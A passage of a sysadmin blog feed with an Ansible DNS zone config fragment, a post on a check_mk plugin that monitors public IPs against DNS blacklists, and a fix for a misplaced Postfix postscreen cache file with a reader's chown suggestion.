ip4:212.41.224.0/24 -all' } txt: - { val: 'v=spf1 ip4:212.41.224.0/24 -all' } - { name: 'xmas', val: 'Merry Christmas' } ns: - { val: ns1.example.com. } - { val: ns2.example.com. } - { name: 'subdom.%', val: 'ns1.%' } mx: - { prio: 5, rec: mx.example.com. } - { prio: 10, rec: mx2.% } srv: - { name: "_sip._udp", val: "0 0 5060 sip.%" } fqdn4: - { domain: "mx", ip: "7.7.7.7" } ptr: - { domain: "www", ip: "8.8.8.8" } a: - { ip: 8.8.8.8 } - { domain: 'www', ip: 8.8.8.8 } - { domain: 'sip', ip: 6.6.6.6 } # the following zone is disabled: - name: alice.com enabled: False </pre><code></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Aug 28 2017</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ansible" hreflang="en">Ansible</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=243&amp;2=comment&amp;3=comment" token="zU_W2MAJyqckkwjlDcj7hoIYMTQfaajbt8qlMirMjXA"></drupal-render-placeholder> </section> Mon, 28 Aug 2017 18:28:00 +0000 Hoti 243 at https://tech.feedyourhead.at check_mk-rbl - A check_mk-plugin that monitors public ipv4 addresses https://tech.feedyourhead.at/content/check_mk-rbl-a_check_mk_plugin_that_alerts_blacklisted_addresses <span class="field field--name-title field--type-string field--label-hidden">check_mk-rbl - A check_mk-plugin that monitors public ipv4 addresses</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Check_MK is a great monitoring tool. One of it's strengths actually is, that it can automatically detect services and monitors it. I always monitored all public ip-addresses of my servers if they are listed on any dns-blacklist. I  had to add new public ip's manually, so I reached out for a new solution. I found a nice little plugin in a <a href="https://github.com/HeinleinSupport/check_mk">GitHub-repository of HeinleinSupport</a>. The plugin waIs great, but I missed two things. First, it checks all Ipv4-addresses of a server,  including private addresses and second it uses hardcoded dnsrbl-server. So I modified the script so that it checks only public addresses and it can use an ini-file, if it exists(otherwhise it still uses hardcoded dns-servers). My modified version <a href="https://github.com/whotwagner/check_mk-rbl">check_mk-rbl is available on github</a>.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Aug 20 2017</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/100" hreflang="en">Monitoring</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/102" hreflang="en">Check_MK</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=242&amp;2=comment&amp;3=comment" token="kz-R6sHq8pRhFgqjnweZhHBFUpaijkAlj65nngshbmU"></drupal-render-placeholder> </section> Sun, 20 Aug 2017 08:12:05 +0000 Hoti 242 at https://tech.feedyourhead.at Fixing "postscreen_cache.db: No such file or directory" https://tech.feedyourhead.at/content/postscreen_cache_db_no_such_file <span class="field field--name-title field--type-string field--label-hidden">Fixing &quot;postscreen_cache.db: No such file or directory&quot;</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>If I enable postscreen on a Debian-Host I'll get this strange message in my mail.log:</p> <pre> <code> Feb 13 08:38:37 tardis postfix/postscreen[17453]: close database /var/lib/postfix/postscreen_cache.db: No such file or directory (possible Berkeley DB bug) </code></pre> <p>It looks like the postscreen_cache.db-file is located in /var/lib/postfix instead of the postfix-jail /var/spool/postfix/var/lib/postfix. So we can fix it by moving the file into the jail:</p> <pre> <code> root@tardis:~# service postfix stop root@tardis:~# mkdir -p /var/spool/postfix/var/lib/postfix root@tardis:~# mv /var/lib/postfix/postscreen_cache.db /var/spool/postfix/var/lib/postfix root@tardis:~# ln -s /var/spool/postfix/var/lib/postfix/postscreen_cache.db /var/lib/postfix/postscreen_cache.db root@tardis:~# service postfix start </code></pre> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Feb 13 2017</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/email" hreflang="en">Email</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/mail" hreflang="en">Mail</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <div class="node__links"> <ul class="links inline"><li class="comment-add"><a href="/content/postscreen_cache_db_no_such_file#comment-form" title="Share your thoughts and opinions." hreflang="en">Add new comment</a></li></ul> </div> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class="title">Comments</h2> <a id="comment-94"></a> <article data-comment-user-id="0" about="/comment/94" typeof="schema:Comment" class="comment js-comment by-anonymous"> <mark class="hidden" data-comment-timestamp="1530798812"></mark> <footer class="comment__meta"> <article typeof="schema:Person" about="/user/0" class="profile"> </article> <p class="comment__submitted"><span rel="schema:author">Submitted by <span lang="" typeof="schema:Person" property="schema:name" datatype="">AlexJ (not verified)</span> on Jul 05 2018</span> <span property="schema:dateCreated" content="2018-07-04T22:49:32+00:00" class="rdf-meta hidden"></span> </p> <a href="/comment/94#comment-94" hreflang="en">Permalink</a> </footer> <div class="content"> <h3 property="schema:name" datatype=""><a href="/comment/94#comment-94" class="permalink" rel="bookmark" hreflang="en">Ownership</a></h3> <div property="schema:text" class="clearfix text-formatted field field--name-comment-body field--type-text-long field--label-hidden field__item"><p>I think you need to add after mkdir:</p> <p>chown -c postfix:postfix /var/spool/postfix/var/lib/postfix</p> </div> <drupal-render-placeholder callback="comment.lazy_builders:renderLinks" arguments="0=94&amp;1=default&amp;2=en&amp;3=" token="ol1xzV6aqwLVHhjNWHhqXfrwgOyPTLPi6CWI9X3RYVE"></drupal-render-placeholder> </div> </article> <div class="indented"><a id="comment-95"></a> <article data-comment-user-id="1" about="/comment/95" typeof="schema:Comment" class="comment js-comment by-node-author"> <mark class="hidden" data-comment-timestamp="1530798837"></mark> <footer class="comment__meta"> <article typeof="schema:Person" about="/users/hoti" class="profile"> </article> <p class="comment__submitted"><span rel="schema:author">Submitted by <span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span> on Jul 05 2018</span> <span property="schema:dateCreated" content="2018-07-05T13:53:57+00:00" class="rdf-meta hidden"></span> </p> <p class="parent visually-hidden">In reply to <a href="/comment/94#comment-94" class="permalink" rel="bookmark" hreflang="en">Ownership</a> by <span lang="" typeof="schema:Person" property="schema:name" datatype="">AlexJ (not verified)</span></p> <a href="/comment/95#comment-95" hreflang="en">Permalink</a> </footer> <div class="content"> <h3 property="schema:name" datatype=""><a href="/comment/95#comment-95" class="permalink" rel="bookmark" hreflang="en">You are right. Thank you</a></h3> <div property="schema:text" class="clearfix text-formatted field field--name-comment-body field--type-text-long field--label-hidden field__item">You are right. Thank you</div> <drupal-render-placeholder callback="comment.lazy_builders:renderLinks" arguments="0=95&amp;1=default&amp;2=en&amp;3=" token="Hbydflre5-H5wZvoxxhvJbrTbsUKOlJdx2g9Q62aN00"></drupal-render-placeholder> </div> </article> </div> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=230&amp;2=comment&amp;3=comment" token="pPqoLsWIjKkqcyirAGN6Yxo6XV_4ZmeucW8SVWKFH-0"></drupal-render-placeholder> </section> Mon, 13 Feb 2017 07:44:03 +0000 Hoti 230 at https://tech.feedyourhead.at